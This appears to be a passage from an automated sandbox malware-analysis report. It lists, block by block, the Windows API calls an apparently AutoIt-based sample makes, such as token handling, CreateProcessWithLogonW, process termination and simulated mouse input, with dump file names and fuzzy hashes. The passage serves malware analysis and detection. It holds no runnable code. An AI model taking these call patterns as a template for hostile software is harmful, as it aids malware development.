                                • VariantClear.OLEAUT32(00000013), ref: 00AFF469
                                • VariantClear.OLEAUT32(00000000), ref: 00AFF4C4
                                • _memmove.LIBCMT ref: 00AFF4EE
                                • VariantClear.OLEAUT32(?), ref: 00AFF53B
                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00AFF569
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Variant$Clear$ChangeInitType_memmove
                                • String ID:
                                • API String ID: 1101466143-0
                                • Opcode ID: a2b9fa915b1702cc26b83af6c6250004d87dd1a1172d83b8f227f5a0fa6f04f6
                                • Instruction ID: e76f874c09c733b21080f344265405d3a7210ff73e06a7e93001910787f18380
                                • Opcode Fuzzy Hash: a2b9fa915b1702cc26b83af6c6250004d87dd1a1172d83b8f227f5a0fa6f04f6
                                • Instruction Fuzzy Hash: 0B516BB5A00209EFCB10DF58D880AAAB7B9FF4C354B158169FE59DB300D730E912CBA0
                                APIs
                                • _memset.LIBCMT ref: 00B02747
                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B02792
                                • IsMenu.USER32(00000000), ref: 00B027B2
                                • CreatePopupMenu.USER32 ref: 00B027E6
                                • GetMenuItemCount.USER32(000000FF), ref: 00B02844
                                • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00B02875
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                • String ID:
                                • API String ID: 3311875123-0
                                • Opcode ID: ff865e76b7830dd195404a2eeb62ff61d76eddc623d8d6e31ab5270e871437be
                                • Instruction ID: 374245df933350164f923ae34e2422a3b2a54720502fe7609c79800fd9aa0fd7
                                • Opcode Fuzzy Hash: ff865e76b7830dd195404a2eeb62ff61d76eddc623d8d6e31ab5270e871437be
                                • Instruction Fuzzy Hash: 92517774A0030AAFDB25CF68C98CAAEBFF4EF44314F1482A9E8119B2D1D7708908CB51
                                APIs
                                  • Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623
                                • BeginPaint.USER32(?,?,?,?,?,?), ref: 00AA179A
                                • GetWindowRect.USER32(?,?), ref: 00AA17FE
                                • ScreenToClient.USER32(?,?), ref: 00AA181B
                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00AA182C
                                • EndPaint.USER32(?,?), ref: 00AA1876
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                • String ID:
                                • API String ID: 1827037458-0
                                • Opcode ID: c6f48755da99eb3e779f6ef62e38fa7f0cd1decb2c765d35961acdcc72f05125
                                • Instruction ID: c327595c16ad4ccf8244f9ff95e77047db85c41f4617e62d7b6f8672dd87400a
                                • Opcode Fuzzy Hash: c6f48755da99eb3e779f6ef62e38fa7f0cd1decb2c765d35961acdcc72f05125
                                • Instruction Fuzzy Hash: 8941AC70504301AFD721DF24CC84BBA7BF8EB4A724F140669F9A58B2E1CB759845DB62
                                APIs
                                • ShowWindow.USER32(00B667B0,00000000,01125920,?,?,00B667B0,?,00B2B862,?,?), ref: 00B2B9CC
                                • EnableWindow.USER32(00000000,00000000), ref: 00B2B9F0
                                • ShowWindow.USER32(00B667B0,00000000,01125920,?,?,00B667B0,?,00B2B862,?,?), ref: 00B2BA50
                                • ShowWindow.USER32(00000000,00000004,?,00B2B862,?,?), ref: 00B2BA62
                                • EnableWindow.USER32(00000000,00000001), ref: 00B2BA86
                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00B2BAA9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Window$Show$Enable$MessageSend
                                • String ID:
                                • API String ID: 642888154-0
                                • Opcode ID: 0d0869a1e09ab0f4a18b75bd9000c68e480f90b9c7487605965ba289c70c5bf8
                                • Instruction ID: d3cf59dc263409950078b5c708787e62509ca8df15bdb98318a5e48af563c9f3
                                • Opcode Fuzzy Hash: 0d0869a1e09ab0f4a18b75bd9000c68e480f90b9c7487605965ba289c70c5bf8
                                • Instruction Fuzzy Hash: D9415030601251AFDB22CF54E489FA57BE0FB06310F1842F9EA4C9F6A2CF31A846CB51
                                APIs
                                • GetForegroundWindow.USER32(?,?,?,?,?,?,00B15134,?,?,00000000,00000001), ref: 00B173BF
                                  • Part of subcall function 00B13C94: GetWindowRect.USER32(?,?), ref: 00B13CA7
                                • GetDesktopWindow.USER32 ref: 00B173E9
                                • GetWindowRect.USER32(00000000), ref: 00B173F0
                                • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00B17422
                                  • Part of subcall function 00B054E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B0555E
                                • GetCursorPos.USER32(?), ref: 00B1744E
                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00B174AC
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                • String ID:
                                • API String ID: 4137160315-0
                                • Opcode ID: 8d7eaf172b895a44aa3b028c4ff6e1fb65b7ecc6aa64937cf5f0f53c1eca3557
                                • Instruction ID: 00c90a3fb0fe27f3fb46c66441054c960a82e9bfb3221564efddacb812ede122
                                • Opcode Fuzzy Hash: 8d7eaf172b895a44aa3b028c4ff6e1fb65b7ecc6aa64937cf5f0f53c1eca3557
                                • Instruction Fuzzy Hash: 0731E672508316ABD730DF14D849F9BBBE9FF98314F400929F58997291CB30EA49CB92
                                APIs
                                  • Part of subcall function 00AF85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AF8608
                                  • Part of subcall function 00AF85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AF8612
                                  • Part of subcall function 00AF85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AF8621
                                  • Part of subcall function 00AF85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AF8628
                                  • Part of subcall function 00AF85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AF863E
                                • GetLengthSid.ADVAPI32(?,00000000,00AF8977), ref: 00AF8DAC
                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00AF8DB8
                                • HeapAlloc.KERNEL32(00000000), ref: 00AF8DBF
                                • CopySid.ADVAPI32(00000000,00000000,?), ref: 00AF8DD8
                                • GetProcessHeap.KERNEL32(00000000,00000000,00AF8977), ref: 00AF8DEC
                                • HeapFree.KERNEL32(00000000), ref: 00AF8DF3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                • String ID:
                                • API String ID: 3008561057-0
                                • Opcode ID: b249cec397ff3122ff2ddb8807686e1e5a6c31b9b41400c6a7234513267715f4
                                • Instruction ID: 263afbea143320c9171202693ea5330ee543132ee640d6d52b4a7c80a1e2dbb9
                                • Opcode Fuzzy Hash: b249cec397ff3122ff2ddb8807686e1e5a6c31b9b41400c6a7234513267715f4
                                • Instruction Fuzzy Hash: 5711AF3190160AFFDB209FA4CC09BBEB779EF55316F104029FA45A7250DB399901CB60
                                APIs
                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00AF8B2A
                                • OpenProcessToken.ADVAPI32(00000000), ref: 00AF8B31
                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00AF8B40
                                • CloseHandle.KERNEL32(00000004), ref: 00AF8B4B
                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00AF8B7A
                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 00AF8B8E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                • String ID:
                                • API String ID: 1413079979-0
                                • Opcode ID: 4cd5d600ffb9933d491e1637589591ff2384c2b582a66c558606ed73e5ea983f
                                • Instruction ID: 7fc9faf49b8ae49dcc80703115619c987e2d6e570ad2cabe8e0b0a74f8c4f307
                                • Opcode Fuzzy Hash: 4cd5d600ffb9933d491e1637589591ff2384c2b582a66c558606ed73e5ea983f
                                • Instruction Fuzzy Hash: 901117B250124EABDB118FA4ED49FEE7BB9EF08704F044065FE04A6160CB769D61AB61
                                APIs
                                  • Part of subcall function 00AA12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AA134D
                                  • Part of subcall function 00AA12F3: SelectObject.GDI32(?,00000000), ref: 00AA135C
                                  • Part of subcall function 00AA12F3: BeginPath.GDI32(?), ref: 00AA1373
                                  • Part of subcall function 00AA12F3: SelectObject.GDI32(?,00000000), ref: 00AA139C
                                • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00B2C1C4
                                • LineTo.GDI32(00000000,00000003,?), ref: 00B2C1D8
                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B2C1E6
                                • LineTo.GDI32(00000000,00000000,?), ref: 00B2C1F6
                                • EndPath.GDI32(00000000), ref: 00B2C206
                                • StrokePath.GDI32(00000000), ref: 00B2C216
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                • String ID:
                                • API String ID: 43455801-0
                                • Opcode ID: a6d1f014125379dcfc6acc86b14ea5388167068ddc509c5145ecfaac81cedd19
                                • Instruction ID: 0455d06bebdc19f33a2006e1556cf4d58a8d534ccc3a32c236c69354519d8ff1
                                • Opcode Fuzzy Hash: a6d1f014125379dcfc6acc86b14ea5388167068ddc509c5145ecfaac81cedd19
                                • Instruction Fuzzy Hash: E311097640010DBFDF119F90DC88EAA7FADEB08354F048076FA189A1A2CB719D55DBA0
                                APIs
                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AC03D3
                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00AC03DB
                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AC03E6
                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AC03F1
                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00AC03F9
                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00AC0401
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Virtual
                                • String ID:
                                • API String ID: 4278518827-0
                                • Opcode ID: 1f62baeddc988a5fe02822317f03e351965fa8db0ff0affc6d9cedbc6c8612db
                                • Instruction ID: 21afb50e52fba53bee43e2a9cefefd3fb430543e312957eb481af45e2e82bf75
                                • Opcode Fuzzy Hash: 1f62baeddc988a5fe02822317f03e351965fa8db0ff0affc6d9cedbc6c8612db
                                • Instruction Fuzzy Hash: 7D016CB090275A7DE3008F5A8C85B52FFB8FF19354F00411BA15C47941C7F5A868CBE5
                                APIs
                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00B0569B
                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B056B1
                                • GetWindowThreadProcessId.USER32(?,?), ref: 00B056C0
                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B056CF
                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B056D9
                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B056E0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                • String ID:
                                • API String ID: 839392675-0
                                • Opcode ID: 5172d70984c88d872df5d6293865695662354c02c463190949f207f26bec624d
                                • Instruction ID: 06f2473d73d27eacf2c26faa708940982258f2b12118c00287dd6834f70862cd
                                • Opcode Fuzzy Hash: 5172d70984c88d872df5d6293865695662354c02c463190949f207f26bec624d
                                • Instruction Fuzzy Hash: 3CF01231541159BBD7315B92DC0DEBB7A7CEBCAB11F000179F905D20509AA51A12C6B5
                                APIs
                                • InterlockedExchange.KERNEL32(?,?), ref: 00B074E5
                                • EnterCriticalSection.KERNEL32(?,?,00AB1044,?,?), ref: 00B074F6
                                • TerminateThread.KERNEL32(00000000,000001F6,?,00AB1044,?,?), ref: 00B07503
                                • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00AB1044,?,?), ref: 00B07510
                                  • Part of subcall function 00B06ED7: CloseHandle.KERNEL32(00000000,?,00B0751D,?,00AB1044,?,?), ref: 00B06EE1
                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00B07523
                                • LeaveCriticalSection.KERNEL32(?,?,00AB1044,?,?), ref: 00B0752A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                • String ID:
                                • API String ID: 3495660284-0
                                • Opcode ID: ee100aad1b349d81583a1e67760f2f5ad310af38ecb2bdceab8960df5e75f309
                                • Instruction ID: 9c356ae674bd78d77f671dd50d5287cedbea11157d5a2150f8a57ae4b346c7ad
                                • Opcode Fuzzy Hash: ee100aad1b349d81583a1e67760f2f5ad310af38ecb2bdceab8960df5e75f309
                                • Instruction Fuzzy Hash: D3F03A3A540613EBDB211B64ED889FA7B7AFF4A302B000571F202A20A4CF755812CE50
                                APIs
                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00AF8E7F
                                • UnloadUserProfile.USERENV(?,?), ref: 00AF8E8B
                                • CloseHandle.KERNEL32(?), ref: 00AF8E94
                                • CloseHandle.KERNEL32(?), ref: 00AF8E9C
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00AF8EA5
                                • HeapFree.KERNEL32(00000000), ref: 00AF8EAC
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                • String ID:
                                • API String ID: 146765662-0
                                • Opcode ID: 28a738d79a816f42713fafd7971e3a1ada91132baa0a66e2ed049b64e7466006
                                • Instruction ID: 6e5791723e9262b0151ee06415fae2be550f3cd7c88d0286fc65a24ac4b21ea2
                                • Opcode Fuzzy Hash: 28a738d79a816f42713fafd7971e3a1ada91132baa0a66e2ed049b64e7466006
                                • Instruction Fuzzy Hash: 83E0C236004002FBDA115FE1ED0C92ABB79FB89322B508230F22992070CF329432DB50
                                APIs
                                • VariantInit.OLEAUT32(?), ref: 00B18928
                                • CharUpperBuffW.USER32(?,?), ref: 00B18A37
                                • VariantClear.OLEAUT32(?), ref: 00B18BAF
                                  • Part of subcall function 00B07804: VariantInit.OLEAUT32(00000000), ref: 00B07844
                                  • Part of subcall function 00B07804: VariantCopy.OLEAUT32(00000000,?), ref: 00B0784D
                                  • Part of subcall function 00B07804: VariantClear.OLEAUT32(00000000), ref: 00B07859
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Variant$ClearInit$BuffCharCopyUpper
                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                • API String ID: 4237274167-1221869570
                                • Opcode ID: 0a1bd3f1e9fa6b5a7cd8c8cbfbf38b9b58de1fa39fea5fe0211234d1db34da78
                                • Instruction ID: b8e7c3271817781ae4edfd032548c520a50f40604cd601051da2ae6b92903596
                                • Opcode Fuzzy Hash: 0a1bd3f1e9fa6b5a7cd8c8cbfbf38b9b58de1fa39fea5fe0211234d1db34da78
                                • Instruction Fuzzy Hash: 55917B716083019FC710DF24C5849ABBBE4FF89754F0489AEF89A8B3A1DB31E945CB52
                                APIs
                                  • Part of subcall function 00ABFEC6: _wcscpy.LIBCMT ref: 00ABFEE9
                                • _memset.LIBCMT ref: 00B03077
                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B030A6
                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B03159
                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00B03187
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
